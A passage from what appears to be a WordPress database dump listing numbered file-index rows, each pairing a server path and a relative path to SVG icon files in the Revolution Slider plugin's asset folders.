assets/svg/communication/ic_business_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_business_24px.svg'),(2769,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_24px.svg'),(2770,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_end_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_end_24px.svg'),(2771,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_made_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_made_24px.svg'),(2772,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_merge_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_merge_24px.svg'),(2773,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_24px.svg'),(2774,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_outgoing_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_outgoing_24px.svg'),(2775,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_received_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_received_24px.svg'),(2776,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_split_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_split_24px.svg'),(2777,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_24px.svg'),(2778,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_bubble_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_bubble_24px.svg'),(2779,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_bubble_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_chat_bubble_outline_24px.svg'),(2780,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_clear_all_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_clear_all_24px.svg'),(2781,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_comment_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_comment_24px.svg'),(2782,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contact_mail_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contact_mail_24px.svg'),(2783,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contact_phone_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contact_phone_24px.svg'),(2784,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contacts_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_contacts_24px.svg'),(2785,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialer_sip_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialer_sip_24px.svg'),(2786,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialpad_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialpad_24px.svg'),(2787,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_email_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_email_24px.svg'),(2788,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_forum_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_forum_24px.svg'),(2789,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_contacts_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_contacts_24px.svg'),(2790,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_export_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_export_24px.svg'),(2791,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_invert_colors_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_invert_colors_off_24px.svg'),(2792,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_live_help_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_live_help_24px.svg'),(2793,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_off_24px.svg'),(2794,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_on_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_on_24px.svg'),(2795,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_mail_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_mail_outline_24px.svg'),(2796,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_message_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_message_24px.svg'),(2797,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_no_sim_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_no_sim_24px.svg'),(2798,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phone_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phone_24px.svg'),(2799,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_erase_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_erase_24px.svg'),(2800,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_lock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_lock_24px.svg'),(2801,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_ring_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_ring_24px.svg'),(2802,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_setup_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_setup_24px.svg'),(2803,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_portable_wifi_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_portable_wifi_off_24px.svg'),(2804,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_present_to_all_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_present_to_all_24px.svg'),(2805,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_ring_volume_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_ring_volume_24px.svg'),(2806,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_screen_share_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_screen_share_24px.svg'),(2807,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_speaker_phone_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_speaker_phone_24px.svg'),(2808,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_landscape_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_landscape_24px.svg'),(2809,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_portrait_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_portrait_24px.svg'),(2810,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_landscape_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_landscape_24px.svg'),(2811,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_portrait_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_portrait_24px.svg'),(2812,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stop_screen_share_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stop_screen_share_24px.svg'),(2813,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_swap_calls_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_swap_calls_24px.svg'),(2814,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_textsms_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_textsms_24px.svg'),(2815,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_voicemail_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_voicemail_24px.svg'),(2816,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_vpn_key_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_vpn_key_24px.svg'),(2817,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_24px.svg'),(2818,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_box_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_box_24px.svg'),(2819,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_circle_24px.svg'),(2820,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_circle_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_circle_outline_24px.svg'),(2821,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_archive_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_archive_24px.svg'),(2822,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_backspace_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_backspace_24px.svg'),(2823,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_block_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_block_24px.svg'),(2824,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_clear_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_clear_24px.svg'),(2825,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_copy_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_copy_24px.svg'),(2826,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_cut_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_cut_24px.svg'),(2827,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_paste_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_content_paste_24px.svg'),(2828,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_create_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_create_24px.svg'),(2829,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_drafts_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_drafts_24px.svg'),(2830,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_filter_list_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_filter_list_24px.svg'),(2831,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_flag_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_flag_24px.svg'),(2832,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_font_download_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_font_download_24px.svg'),(2833,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_forward_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_forward_24px.svg'),(2834,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_gesture_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_gesture_24px.svg'),(2835,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_inbox_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_inbox_24px.svg'),(2836,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_link_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_link_24px.svg'),(2837,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_mail_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_mail_24px.svg'),(2838,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_markunread_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_markunread_24px.svg'),(2839,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_move_to_inbox_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_move_to_inbox_24px.svg'),(2840,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_next_week_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_next_week_24px.svg'),(2841,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_redo_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_redo_24px.svg'),(2842,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_24px.svg'),(2843,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_24px.svg'),(2844,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_outline_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_outline_24px.svg'),(2845,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_24px.svg'),(2846,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_all_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_all_24px.svg'),(2847,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_report_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_report_24px.svg'),(2848,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_save_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_save_24px.svg'),(2849,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_select_all_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_select_all_24px.svg'),(2850,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_send_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_send_24px.svg'),(2851,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_sort_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_sort_24px.svg'),(2852,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_text_format_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_text_format_24px.svg'),(2853,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_unarchive_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_unarchive_24px.svg'),(2854,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_undo_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_undo_24px.svg'),(2855,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_weekend_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_weekend_24px.svg'),(2856,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarm_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarm_24px.svg'),(2857,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarms_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarms_24px.svg'),(2858,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_time_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_time_24px.svg'),(2859,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_add_alarm_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_add_alarm_24px.svg'),(2860,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_active_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_active_24px.svg'),(2861,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_inactive_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_inactive_24px.svg'),(2862,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_20_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_20_24px.svg'),(2863,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_30_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_30_24px.svg'),(2864,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_50_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_50_24px.svg'),(2865,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_60_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_60_24px.svg'),(2866,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_80_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_80_24px.svg'),(2867,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_90_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_90_24px.svg'),(2868,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_alert_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_alert_24px.svg'),(2869,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_20_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_20_24px.svg'),(2870,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_30_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_30_24px.svg'),(2871,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_50_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_50_24px.svg'),(2872,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_60_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_60_24px.svg'),(2873,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_80_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_80_24px.svg'),(2874,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_90_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_90_24px.svg'),(2875,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_full_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_full_24px.svg'),(2876,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_full_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_full_24px.svg'),(2877,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_std_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_std_24px.svg'),(2878,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_unknown_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_unknown_24px.svg'),(2879,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_24px.svg'),(2880,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_connected_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_connected_24px.svg'),(2881,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_disabled_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_disabled_24px.svg'),(2882,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_searching_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_searching_24px.svg'),(2883,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_auto_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_auto_24px.svg'),(2884,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_high_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_high_24px.svg'),(2885,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_low_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_low_24px.svg'),(2886,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_medium_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_medium_24px.svg'),(2887,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_data_usage_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_data_usage_24px.svg'),(2888,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_developer_mode_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_developer_mode_24px.svg'),(2889,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_devices_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_devices_24px.svg'),(2890,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_dvr_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_dvr_24px.svg'),(2891,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_fixed_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_fixed_24px.svg'),(2892,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_not_fixed_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_not_fixed_24px.svg'),(2893,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_gps_off_24px.svg'),(2894,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_graphic_eq_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_graphic_eq_24px.svg'),(2895,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_disabled_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_disabled_24px.svg'),(2896,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_searching_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_location_searching_24px.svg'),(2897,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_cell_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_cell_24px.svg'),(2898,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_wifi_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_network_wifi_24px.svg'),(2899,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_nfc_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_nfc_24px.svg'),(2900,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_landscape_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_landscape_24px.svg'),(2901,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_portrait_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_portrait_24px.svg'),(2902,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_rotation_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_rotation_24px.svg'),(2903,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_rotation_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_rotation_24px.svg'),(2904,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_sd_storage_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_sd_storage_24px.svg'),(2905,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_settings_system_daydream_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_settings_system_daydream_24px.svg'),(2906,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_0_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_0_bar_24px.svg'),(2907,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_1_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_1_bar_24px.svg'),(2908,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_2_ba